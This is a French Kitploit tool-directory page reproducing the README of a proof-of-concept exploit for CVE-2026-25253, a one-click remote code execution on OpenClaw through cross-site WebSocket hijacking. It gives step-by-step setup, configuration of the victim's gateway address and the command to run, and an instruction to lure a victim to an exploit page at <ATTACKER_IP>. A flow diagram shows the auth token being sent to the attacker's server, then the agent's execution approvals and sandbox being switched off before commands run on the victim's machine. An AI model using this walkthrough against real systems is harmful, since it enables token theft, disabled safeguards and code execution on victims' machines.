Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-25253-research — Preuve de concept pour CVE-2026-25253, démontrant une exécution de code à distance (RCE) en un clic sur OpenClaw via un détournement de WebSocket intersite (Cross-Site WebSocket Hijacking). Inclut un serveur attaquant et une charge utile basée sur le navigateur pour voler les jetons et exécuter des commandes. | Kitploit
Outils/GitHubGitHub/al4n4n/cve-2026-25253-research
ReconnaissanceExploitationExploitation d'Applications WebSécurité WebRed TeamingDéveloppement de Charges Utiles
GitHubal4n4n/cve-2026-25253-research

CVE-2026-25253-research

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
715il y a 7 moisPas encore vérifié

À propos

Preuve de concept pour CVE-2026-25253, démontrant une exécution de code à distance (RCE) en un clic sur OpenClaw via un détournement de WebSocket intersite (Cross-Site WebSocket Hijacking). Inclut un serveur attaquant et une charge utile basée sur le navigateur pour voler les jetons et exécuter des commandes.

Partager

Preuve de concept CVE-2026-25253

Exécution de code à distance (RCE) en un clic sur OpenClaw via détournement de WebSocket inter-site (Cross-Site WebSocket Hijacking).

AVERTISSEMENT : Ce code est fourni uniquement à des fins de recherche en sécurité autorisée et à des fins éducatives. L'utilisation de ce code contre des systèmes sans autorisation écrite explicite est illégale et contraire à l'éthique. L'auteur décline toute responsabilité en cas d'utilisation abusive.

Blog

Lisez l'analyse détaillée pour une analyse au niveau du code source de cette vulnérabilité et de la manière dont cette preuve de concept a été construite.

Prérequis

  • Node.js (v18 ou ultérieur)
  • Une instance OpenClaw en cours d'exécution avec la passerelle (Gateway) sur la machine victime (par défaut : localhost:18789)
  • La victime doit disposer d'un jeton d'authentification actif stocké dans son navigateur (c'est-à-dire qu'elle a déjà utilisé l'interface de contrôle)

Installer Node.js

macOS (Homebrew) :

root@kitploit:~
brew install node

Ubuntu / Debian :

root@kitploit:~
curl -fsSL https://deb.nodesource.com/setup_22.x | sudo -E bash -
sudo apt-get install -y nodejs

Windows :

Téléchargez le programme d'installation depuis https://nodejs.org/ et suivez les instructions.

Vérifiez l'installation :

root@kitploit:~
node -v
npm -v

Configuration

root@kitploit:~
git clone https://github.com/al4n4n/CVE-2026-25253-research.git
cd CVE-2026-25253-research
npm install

Cette commande installe la seule dépendance : ws (bibliothèque WebSocket).

Configuration

Modifiez le début de exploit.html pour l'adapter à votre environnement :

root@kitploit:~
const LOCAL_SCHEME = 'http';                // Schéma de l'interface de contrôle de la victime
const GATEWAY_URL = 'ws://127.0.0.1:18789'; // Passerelle locale de la victime
const ATTACKER_WS_PORT = 8080;              // Port WS de l'attaquant (doit correspondre à attacker-server.js)
const ATTACKER_SCHEME = 'ws';               // Utilisez 'wss' derrière TLS
const COMMAND = 'touch /tmp/success';       // Commande à exécuter sur l'hôte victime

Modifiez le début de attacker-server.js si vous avez besoin de ports différents :

root@kitploit:~
const HTTP_PORT = 3000;  // Sert exploit.html
const WS_PORT = 8080;    // Capture les jetons volés

Exécution

1. Démarrez le serveur de l'attaquant

root@kitploit:~
node attacker-server.js

Vous devriez voir :

root@kitploit:~
============================================================
CVE-2026-25253 Attack Server
============================================================

[HTTP]  Exploit page: http://0.0.0.0:3000/exploit.html
[WS]    Token capture: ws://0.0.0.0:8080

Waiting for victim...

2. Attirez la victime

Envoyez à la victime l'URL suivante (remplacez <ATTACKER_IP> par votre adresse IP) :

root@kitploit:~
http://<ATTACKER_IP>:3000/exploit.html

La victime doit ouvrir ce lien dans un navigateur où elle a déjà utilisé l'interface de contrôle OpenClaw (afin que le jeton d'authentification existe dans localStorage).

3. Ce qui se passe

root@kitploit:~
┌──────────────────────────────────────────────────────────────────────────┐
│                          EXPLOIT FLOW                                    │
├──────────────────────────────────────────────────────────────────────────┤
│                                                                          │
│  1. Victim visits http://<attacker>:3000/exploit.html                    │
│     │                                                                    │
│  2. Page opens popup: http://127.0.0.1:18789?gatewayUrl=ws://<attacker>  │
│     │                                                                    │
│  3. Control UI in popup reads token from localStorage                    │
│     and sends it to attacker's WS server via gatewayUrl                  │
│     │                                                                    │
│  4. Attacker server rejects first connect (device token)                 │
│     Control UI retries with settings token → CAPTURED                    │
│     │                                                                    │
│  5. exploit.html opens its OWN WebSocket to ws://127.0.0.1:18789         │
│     (Cross-Site WebSocket Hijacking - no Origin validation)              │
│     │                                                                    │
│  6. Authenticates with stolen token, disables security:                  │
│     • exec.approvals.set → ask: "off"                                    │
│     • config.patch → host: "gateway", sandbox.mode: "off"                │
│     │                                                                    │
│  7. Sends agent command → RCE on victim host                             │
│                                                                          │
└──────────────────────────────────────────────────────────────────────────┘

4. Vérification

Sur la machine victime, vérifiez si la commande a été exécutée :

root@kitploit:~
ls -la /tmp/success

Fichiers

FichierDescription
attacker-server.jsServeur HTTP (sert la page d'exploitation) + serveur WebSocket (capture les jetons volés)
exploit.htmlCharge utile d'exploitation basée sur le navigateur qui vole les jetons, détourne le WebSocket, désactive la sécurité et exécute des commandes
Télécharger l’outil
package.jsonDépendances Node.js (ws)